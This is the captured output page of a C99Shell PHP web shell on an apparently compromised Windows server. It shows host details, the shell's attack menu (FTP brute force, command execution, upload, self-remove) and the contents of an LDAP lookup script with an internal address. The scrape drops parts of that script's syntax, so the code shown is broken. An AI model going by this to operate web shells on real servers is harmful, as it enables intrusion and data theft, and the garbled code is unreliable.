!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\sig\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ldap2.php (578 B)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$ldap 
ldap_connect('192.168.168.4');
 
if(!
$ldap) {
  die(
'No conn.');
}
 
if(!
ldap_bind($ldap$ldap_user$password)) {
  die(
'No conn');
}
 
$base_dn 'o=dominio,o=local';
$search ldap_search($ldap$base_dn'uid='.$username);
if(
ldap_count_entries($ldap$search) < 1) {
  die(
'No se encuentra el usuario');
}
 
$info ldap_get_entries($ldap$search);
 
if(isset(
$info[0]['name'])) {
  echo 
'Username '.$username.' has name '.$info[0]['name'];
} else {
  echo 
'Entry -name- not found in username '.$username;
}
 
ldap_close($ldap);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--